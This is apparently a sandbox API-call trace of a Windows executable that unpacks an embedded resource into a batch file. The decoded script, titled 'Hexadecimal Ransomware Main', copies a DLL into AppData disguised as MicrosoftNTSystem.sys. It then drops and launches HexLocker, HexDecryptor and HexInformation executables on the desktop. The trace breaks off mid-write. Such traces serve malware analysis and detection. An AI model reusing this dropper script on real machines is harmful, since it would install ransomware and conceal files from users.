0x0 [0075.710] SetLastError (dwErrCode=0x0) [0075.710] wcslen (_String="@shift ") returned 0x7 [0075.710] wcslen (_String="/") returned 0x1 [0075.711] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68050, Size=0x1a) returned 0x2a69d20 [0075.711] GetLastError () returned 0x0 [0075.711] SetLastError (dwErrCode=0x0) [0075.711] GetLastError () returned 0x0 [0075.711] SetLastError (dwErrCode=0x0) [0075.711] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676a8, Size=0xc) returned 0x2a67708 [0075.711] GetLastError () returned 0x0 [0075.711] SetLastError (dwErrCode=0x0) [0075.711] wcslen (_String="@shift /") returned 0x8 [0075.711] wcslen (_String="0") returned 0x1 [0075.711] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a69d20, Size=0x1c) returned 0x2a69de8 [0075.711] GetLastError () returned 0x0 [0075.711] SetLastError (dwErrCode=0x0) [0075.711] GetLastError () returned 0x0 [0075.711] SetLastError (dwErrCode=0x0) [0075.711] GetLastError () returned 0x0 [0075.711] SetLastError (dwErrCode=0x0) [0075.711] GetLastError () returned 0x0 [0075.711] SetLastError (dwErrCode=0x0) [0075.711] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x9c) returned 0x2a910b0 [0075.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0075.711] malloc (_Size=0x22) returned 0x1121150 [0075.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=33, lpMultiByteStr=0x1121150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0075.711] free (_Block=0x1121150) [0075.711] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.712] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a682c8 [0075.712] GetLastError () returned 0x0 [0075.712] SetLastError (dwErrCode=0x0) [0075.712] GetLastError () returned 0x0 [0075.712] SetLastError (dwErrCode=0x0) [0075.712] GetLastError () returned 0x0 [0075.712] SetLastError (dwErrCode=0x0) [0075.712] GetLastError () returned 0x0 [0075.712] SetLastError (dwErrCode=0x0) [0075.712] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a910b0 [0075.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0075.712] malloc (_Size=0x22) returned 0x1121150 [0075.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=33, lpMultiByteStr=0x1121150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0075.713] free (_Block=0x1121150) [0075.713] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.713] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a6a3c8 [0075.713] GetLastError () returned 0x0 [0075.713] SetLastError (dwErrCode=0x0) [0075.713] GetLastError () returned 0x0 [0075.713] SetLastError (dwErrCode=0x0) [0075.713] GetLastError () returned 0x0 [0075.713] SetLastError (dwErrCode=0x0) [0075.713] GetLastError () returned 0x0 [0075.713] SetLastError (dwErrCode=0x0) [0075.713] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a910b0 [0075.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B5D7C8559F3EFA10E7B554CBD10E295D", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0075.713] malloc (_Size=0x22) returned 0x1121150 [0075.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="B5D7C8559F3EFA10E7B554CBD10E295D", cchWideChar=33, lpMultiByteStr=0x1121150, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B5D7C8559F3EFA10E7B554CBD10E295D", lpUsedDefaultChar=0x0) returned 33 [0075.714] free (_Block=0x1121150) [0075.714] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.714] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a6a568 [0075.714] GetLastError () returned 0x0 [0075.714] SetLastError (dwErrCode=0x0) [0075.715] GetLastError () returned 0x0 [0075.715] SetLastError (dwErrCode=0x0) [0075.715] GetLastError () returned 0x0 [0075.715] SetLastError (dwErrCode=0x0) [0075.715] GetLastError () returned 0x0 [0075.715] SetLastError (dwErrCode=0x0) [0075.715] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a910b0 [0075.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="62E2D23AB778D0D43509F60B2A1B5BF33A568DF0", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0075.715] malloc (_Size=0x2a) returned 0x1121150 [0075.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="62E2D23AB778D0D43509F60B2A1B5BF33A568DF0", cchWideChar=41, lpMultiByteStr=0x1121150, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="62E2D23AB778D0D43509F60B2A1B5BF33A568DF0", lpUsedDefaultChar=0x0) returned 41 [0075.715] free (_Block=0x1121150) [0075.715] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.716] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a6a0f0 [0075.716] GetLastError () returned 0x0 [0075.716] SetLastError (dwErrCode=0x0) [0075.716] GetLastError () returned 0x0 [0075.716] SetLastError (dwErrCode=0x0) [0075.716] GetLastError () returned 0x0 [0075.716] SetLastError (dwErrCode=0x0) [0075.716] GetLastError () returned 0x0 [0075.716] SetLastError (dwErrCode=0x0) [0075.716] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a910b0 [0075.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C63F2F1C9CD0CEB9D1DEDAF696353C0EACD7AD3D", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0075.716] malloc (_Size=0x2a) returned 0x1121150 [0075.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C63F2F1C9CD0CEB9D1DEDAF696353C0EACD7AD3D", cchWideChar=41, lpMultiByteStr=0x1121150, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C63F2F1C9CD0CEB9D1DEDAF696353C0EACD7AD3D", lpUsedDefaultChar=0x0) returned 41 [0075.717] free (_Block=0x1121150) [0075.717] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.717] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a6a498 [0075.717] GetLastError () returned 0x0 [0075.717] SetLastError (dwErrCode=0x0) [0075.831] GetLastError () returned 0x0 [0075.831] SetLastError (dwErrCode=0x0) [0075.831] wcslen (_String="F6E32ACAD57B2728377A544EC47709DC4B2960FE") returned 0x28 [0075.831] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a6a430 [0075.831] FindResourceW (hModule=0x400000, lpName="F6E32ACAD57B2728377A544EC47709DC4B2960FE", lpType=0xa) returned 0x0 [0075.831] GetLastError () returned 0x716 [0075.831] SetLastError (dwErrCode=0x716) [0075.831] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a430 | out: hHeap=0x2a60000) returned 1 [0075.831] GetLastError () returned 0x0 [0075.831] SetLastError (dwErrCode=0x0) [0075.831] GetLastError () returned 0x0 [0075.831] SetLastError (dwErrCode=0x0) [0075.831] GetLastError () returned 0x0 [0075.831] SetLastError (dwErrCode=0x0) [0075.831] wcslen (_String="77D24276301AC0DB4D0DBAE41E04C4D0D06375BB") returned 0x28 [0075.831] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a6a638 [0075.831] FindResourceW (hModule=0x400000, lpName="77D24276301AC0DB4D0DBAE41E04C4D0D06375BB", lpType=0xa) returned 0x8592e8 [0075.832] LoadResource (hModule=0x400000, hResInfo=0x8592e8) returned 0xbd37dc [0075.832] SizeofResource (hModule=0x400000, hResInfo=0x8592e8) returned 0xb [0075.832] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0xb) returned 0x10e07c8 [0075.832] FreeResource (hResData=0xbd37dc) returned 0 [0075.832] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e07c8) returned 0xb [0075.832] wcslen (_String="E1496274842FB5E4729CE4A34ECC1471") returned 0x20 [0075.832] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a681c0 [0075.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0075.832] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x21) returned 0x10e07e0 [0075.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x10e07e0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0075.832] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e07e0) returned 0x21 [0075.832] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a910b0 [0075.832] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a914d0 [0075.832] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.832] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a910b0 [0075.832] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a914d0 | out: hHeap=0x2a90000) returned 1 [0075.832] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a910d8 [0075.833] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e07e0 | out: hHeap=0x10e0000) returned 1 [0075.833] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a681c0 | out: hHeap=0x2a60000) returned 1 [0075.833] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.833] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910d8 | out: hHeap=0x2a90000) returned 1 [0075.833] GetLastError () returned 0x0 [0075.833] SetLastError (dwErrCode=0x0) [0075.833] GetLastError () returned 0x0 [0075.833] SetLastError (dwErrCode=0x0) [0075.833] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x10e07c8, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0075.833] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x10e07c8, cbMultiByte=10, lpWideCharStr=0x2a60608, cchWideChar=11 | out: lpWideCharStr="ddssas.bat7B2728377A544EC47709DC4B2960FE") returned 10 [0075.833] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a018 [0075.833] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e07c8 | out: hHeap=0x10e0000) returned 1 [0075.833] GetLastError () returned 0x0 [0075.833] SetLastError (dwErrCode=0x0) [0075.833] wcslen (_String="ddssas.bat") returned 0xa [0075.836] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a638 | out: hHeap=0x2a60000) returned 1 [0075.836] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a018 | out: hHeap=0x2a60000) returned 1 [0075.836] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a69d20 [0075.837] GetLastError () returned 0x0 [0075.837] SetLastError (dwErrCode=0x0) [0075.837] GetLastError () returned 0x0 [0075.837] SetLastError (dwErrCode=0x0) [0075.837] wcslen (_String="62E2D23AB778D0D43509F60B2A1B5BF33A568DF0") returned 0x28 [0075.837] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a6a5d0 [0075.837] FindResourceW (hModule=0x400000, lpName="62E2D23AB778D0D43509F60B2A1B5BF33A568DF0", lpType=0xa) returned 0x0 [0075.837] GetLastError () returned 0x716 [0075.837] SetLastError (dwErrCode=0x716) [0075.837] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a5d0 | out: hHeap=0x2a60000) returned 1 [0075.837] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xa) returned 0x2a676c0 [0075.837] GetLastError () returned 0x0 [0075.837] SetLastError (dwErrCode=0x0) [0075.837] GetLastError () returned 0x0 [0075.837] SetLastError (dwErrCode=0x0) [0075.837] wcslen (_String="C63F2F1C9CD0CEB9D1DEDAF696353C0EACD7AD3D") returned 0x28 [0075.837] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x5a) returned 0x2a6a638 [0075.837] FindResourceW (hModule=0x400000, lpName="C63F2F1C9CD0CEB9D1DEDAF696353C0EACD7AD3D", lpType=0xa) returned 0x0 [0075.837] GetLastError () returned 0x716 [0075.837] SetLastError (dwErrCode=0x716) [0075.837] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a638 | out: hHeap=0x2a60000) returned 1 [0075.838] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xa) returned 0x2a677b0 [0075.838] GetLastError () returned 0x0 [0075.838] SetLastError (dwErrCode=0x0) [0075.838] GetLastError () returned 0x0 [0075.838] SetLastError (dwErrCode=0x0) [0075.838] wcslen (_String="B5D7C8559F3EFA10E7B554CBD10E295D") returned 0x20 [0075.838] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a68428 [0075.838] FindResourceW (hModule=0x400000, lpName="B5D7C8559F3EFA10E7B554CBD10E295D", lpType=0xa) returned 0x859360 [0075.838] LoadResource (hModule=0x400000, hResInfo=0x859360) returned 0xc368d4 [0075.838] SizeofResource (hModule=0x400000, hResInfo=0x859360) returned 0x1df [0075.838] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x1df) returned 0x10e07c8 [0075.838] FreeResource (hResData=0xc368d4) returned 0 [0075.838] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e07c8) returned 0x1df [0075.838] wcslen (_String="E1496274842FB5E4729CE4A34ECC1471") returned 0x20 [0075.838] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a68480 [0075.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0075.838] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x21) returned 0x10e09b0 [0075.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x10e09b0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0075.838] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e09b0) returned 0x21 [0075.838] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a910b0 [0075.838] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a914d0 [0075.838] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.838] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a910b0 [0075.839] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a914d0 | out: hHeap=0x2a90000) returned 1 [0075.839] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a910d8 [0075.839] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e09b0 | out: hHeap=0x10e0000) returned 1 [0075.839] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68480 | out: hHeap=0x2a60000) returned 1 [0075.839] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910b0 | out: hHeap=0x2a90000) returned 1 [0075.839] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a910d8 | out: hHeap=0x2a90000) returned 1 [0075.839] GetLastError () returned 0x0 [0075.839] SetLastError (dwErrCode=0x0) [0075.839] GetLastError () returned 0x0 [0075.839] SetLastError (dwErrCode=0x0) [0075.839] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x10e07c8, cbMultiByte=478, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 478 [0075.839] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x10e07c8, cbMultiByte=478, lpWideCharStr=0x2a60608, cchWideChar=479 | out: lpWideCharStr="@echo off\r\ntitle Hexadecimal Ransomware Main\r\ntree\r\ntree\r\ntree\r\ntree\r\ntree\r\ncopy rd000db.dll C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys\r\ncopy HexIF.hex C:\\Users\\%username%\\desktop\\HexInformation.exe\r\ncopy HexDCIF.hex C:\\Users\\%username%\\desktop\\HexDecryptor.exe\r\ncopy HexLK.hex C:\\Users\\%username%\\desktop\\HexLocker.exe\r\ndel rd000db.dll\r\ncd C:\\Users\\%username%\\desktop\r\nstart HexInformation.exe\r\nstart HexDecryptor.exe\r\nstart HexLocker.exe\r\nexit ") returned 478 [0075.839] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3c6) returned 0x2a6a868 [0075.839] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e07c8 | out: hHeap=0x10e0000) returned 1 [0075.839] GetLastError () returned 0x0 [0075.839] SetLastError (dwErrCode=0x0) [0075.839] wcslen (_String="@echo off\r\ntitle Hexadecimal Ransomware Main\r\ntree\r\ntree\r\ntree\r\ntree\r\ntree\r\ncopy rd000db.dll C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys\r\ncopy HexIF.hex C:\\Users\\%username%\\desktop\\HexInformation.exe\r\ncopy HexDCIF.hex C:\\Users\\%username%\\desktop\\HexDecryptor.exe\r\ncopy HexLK.hex C:\\Users\\%username%\\desktop\\HexLocker.exe\r\ndel rd000db.dll\r\ncd C:\\Users\\%username%\\desktop\r\nstart HexInformation.exe\r\nstart HexDecryptor.exe\r\nstart HexLocker.exe\r\nexit") returned 0x1de [0075.839] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68428 | out: hHeap=0x2a60000) returned 1 [0075.839] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a868 | out: hHeap=0x2a60000) returned 1 [0075.839] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3c6) returned 0x2a6a868 [0075.839] GetLastError () returned 0x0 [0075.840] SetLastError (dwErrCode=0x0) [0075.840] GetLastError () returned 0x0 [0075.840] SetLastError (dwErrCode=0x0) [0075.840] GetLastError () returned 0x0 [0075.840] SetLastError (dwErrCode=0x0) [0075.840] GetLastError () returned 0x0 [0075.840] SetLastError (dwErrCode=0x0) [0075.840] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCC.tmp") returned 0x3d [0075.840] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x84) returned 0x2a6ac38 [0075.840] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2710) returned 0x10e07c8 [0075.840] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCC.tmp", lpszShortPath=0x10e07c8, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCC.tmp") returned 0x3d [0075.840] GetLastError () returned 0x0 [0075.840] SetLastError (dwErrCode=0x0) [0075.840] GetLastError () returned 0x0 [0075.840] SetLastError (dwErrCode=0x0) [0075.840] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x84) returned 0x2a6acc8 [0075.841] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e07c8 | out: hHeap=0x10e0000) returned 1 [0075.841] GetLastError () returned 0x0 [0075.841] SetLastError (dwErrCode=0x0) [0075.841] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCC.tmp") returned 0x3d [0075.841] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6ac38 | out: hHeap=0x2a60000) returned 1 [0075.841] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6acc8 | out: hHeap=0x2a60000) returned 1 [0075.841] free (_Block=0x11224f0) [0075.841] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676c0, Size=0xa) returned 0x2a67738 [0075.841] GetLastError () returned 0x0 [0075.841] SetLastError (dwErrCode=0x0) [0075.841] GetLastError () returned 0x0 [0075.841] SetLastError (dwErrCode=0x0) [0075.841] GetLastError () returned 0x0 [0075.841] SetLastError (dwErrCode=0x0) [0075.841] GetLastError () returned 0x0 [0075.842] SetLastError (dwErrCode=0x0) [0075.842] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\extd.exe") returned 0x3d [0075.842] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x84) returned 0x2a6ac38 [0075.842] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2710) returned 0x10e07c8 [0075.842] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\extd.exe", lpszShortPath=0x10e07c8, cchBuffer=0x2710 | out: lpszShortPath="") returned 0x0 [0075.842] GetLastError () returned 0x2 [0075.842] SetLastError (dwErrCode=0x2) [0075.842] GetLastError () returned 0x2 [0075.843] SetLastError (dwErrCode=0x2) [0075.843] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xa) returned 0x2a677e0 [0075.843] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e07c8 | out: hHeap=0x10e0000) returned 1 [0075.843] GetLastError () returned 0x0 [0075.843] SetLastError (dwErrCode=0x0) [0075.843] wcslen (_String="") returned 0x0 [0075.843] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6ac38 | out: hHeap=0x2a60000) returned 1 [0075.843] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a677e0 | out: hHeap=0x2a60000) returned 1 [0075.843] free (_Block=0x1121150) [0075.843] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67738, Size=0xa) returned 0x2a676a8 [0075.843] GetLastError () returned 0x0 [0075.843] SetLastError (dwErrCode=0x0) [0075.843] GetLastError () returned 0x0 [0075.843] SetLastError (dwErrCode=0x0) [0075.843] wcslen (_String="@shift /0") returned 0x9 [0075.844] wcslen (_String="\r\n") returned 0x2 [0075.844] wcslen (_String="") returned 0x0 [0075.844] wcslen (_String="@echo off\r\ntitle Hexadecimal Ransomware Main\r\ntree\r\ntree\r\ntree\r\ntree\r\ntree\r\ncopy rd000db.dll C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys\r\ncopy HexIF.hex C:\\Users\\%username%\\desktop\\HexInformation.exe\r\ncopy HexDCIF.hex C:\\Users\\%username%\\desktop\\HexDecryptor.exe\r\ncopy HexLK.hex C:\\Users\\%username%\\desktop\\HexLocker.exe\r\ndel rd000db.dll\r\ncd C:\\Users\\%username%\\desktop\r\nstart HexInformation.exe\r\nstart HexDecryptor.exe\r\nstart HexLocker.exe\r\nexit") returned 0x1de [0075.844] wcslen (_String="") returned 0x0 [0075.844] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat") returned 0x3d [0075.844] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x84) returned 0x2a6ac38 [0075.844] wcslen (_String="@shift /0\r\n@echo off\r\ntitle Hexadecimal Ransomware Main\r\ntree\r\ntree\r\ntree\r\ntree\r\ntree\r\ncopy rd000db.dll C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys\r\ncopy HexIF.hex C:\\Users\\%username%\\desktop\\HexInformation.exe\r\ncopy HexDCIF.hex C:\\Users\\%username%\\desktop\\HexDecryptor.exe\r\ncopy HexLK.hex C:\\Users\\%username%\\desktop\\HexLocker.exe\r\ndel rd000db.dll\r\ncd C:\\Users\\%username%\\desktop\r\nstart HexInformation.exe\r\nstart HexDecryptor.exe\r\nstart HexLocker.exe\r\nexit") returned 0x1e9 [0075.844] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3dc) returned 0x2a6acc8 [0075.844] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a910b0 [0075.844] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0075.845] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a910e0 [0075.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="@shift /0\r\n@echo off\r\ntitle Hexadecimal Ransomware Main\r\ntree\r\ntree\r\ntree\r\ntree\r\ntree\r\ncopy rd000db.dll C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys\r\ncopy HexIF.hex C:\\Users\\%username%\\desktop\\HexInformation.exe\r\ncopy HexDCIF.hex C:\\Users\\%username%\\desktop\\HexDecryptor.exe\r\ncopy HexLK.hex C:\\Users\\%username%\\desktop\\HexLocker.exe\r\ndel rd000db.dll\r\ncd 